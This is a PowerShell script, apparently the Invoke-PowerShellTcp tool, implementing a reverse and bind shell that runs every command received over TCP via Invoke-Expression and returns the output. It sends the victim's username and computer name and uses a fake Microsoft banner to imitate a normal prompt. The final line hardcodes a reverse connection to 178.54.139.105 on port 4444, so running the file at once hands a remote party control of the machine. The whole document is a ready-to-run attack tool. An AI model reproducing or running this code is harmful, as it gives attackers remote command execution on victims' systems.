  1. function Invoke-PowerShellTcp
  2. {
  3. [CmdletBinding(DefaultParameterSetName="reverse")] Param(
  4.  
  5. [Parameter(Position = 0, Mandatory = $true, ParameterSetName="reverse")]
  6. [Parameter(Position = 0, Mandatory = $false, ParameterSetName="bind")]
  7. [String]
  8. $IPAddress,
  9.  
  10. [Parameter(Position = 1, Mandatory = $true, ParameterSetName="reverse")]
  11. [Parameter(Position = 1, Mandatory = $true, ParameterSetName="bind")]
  12. [Int]
  13. $Port,
  14.  
  15. [Parameter(ParameterSetName="reverse")]
  16. [Switch]
  17. $Reverse,
  18.  
  19. [Parameter(ParameterSetName="bind")]
  20. [Switch]
  21. $Bind
  22.  
  23. )
  24.  
  25.  
  26. try
  27. {
  28. #Connect back if the reverse switch is used.
  29. if ($Reverse)
  30. {
  31. $client = New-Object System.Net.Sockets.TCPClient($IPAddress,$Port)
  32. }
  33.  
  34. #Bind to the provided port if Bind switch is used.
  35. if ($Bind)
  36. {
  37. $listener = [System.Net.Sockets.TcpListener]$Port
  38. $listener.start()
  39. $client = $listener.AcceptTcpClient()
  40. }
  41.  
  42. $stream = $client.GetStream()
  43. [byte[]]$bytes = 0..65535|%{0}
  44.  
  45. #Send back current username and computername
  46. $sendbytes = ([text.encoding]::ASCII).GetBytes("Windows PowerShell running as user " + $env:username + " on " + $env:computername + "`nCopyright (C) 2015 Microsoft Corporation. All rights reserved.`n`n")
  47. $stream.Write($sendbytes,0,$sendbytes.Length)
  48.  
  49. #Show an interactive PowerShell prompt
  50. $sendbytes = ([text.encoding]::ASCII).GetBytes('PS ' + (Get-Location).Path + '>')
  51. $stream.Write($sendbytes,0,$sendbytes.Length)
  52.  
  53. while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)
  54. {
  55. $EncodedText = New-Object -TypeName System.Text.ASCIIEncoding
  56. $data = $EncodedText.GetString($bytes,0, $i)
  57. try
  58. {
  59. #Execute the command on the target.
  60. $sendback = (Invoke-Expression -Command $data 2>&1 | Out-String )
  61. }
  62. catch
  63. {
  64. Write-Warning "Something went wrong with execution of command on the target."
  65. Write-Error $_
  66. }
  67. $sendback2 = $sendback + 'PS ' + (Get-Location).Path + '> '
  68. $x = ($error[0] | Out-String)
  69. $error.clear()
  70. $sendback2 = $sendback2 + $x
  71.  
  72. #Return the results
  73. $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)
  74. $stream.Write($sendbyte,0,$sendbyte.Length)
  75. $stream.Flush()
  76. }
  77. $client.Close()
  78. if ($listener)
  79. {
  80. $listener.Stop()
  81. }
  82. }
  83. catch
  84. {
  85. Write-Warning "Something went wrong! Check if the server is reachable and you are using the correct port."
  86. Write-Error $_
  87. }
  88. }
  89. Invoke-PowerShellTcp -Reverse -IPAddress 178.54.139.105 -Port 4444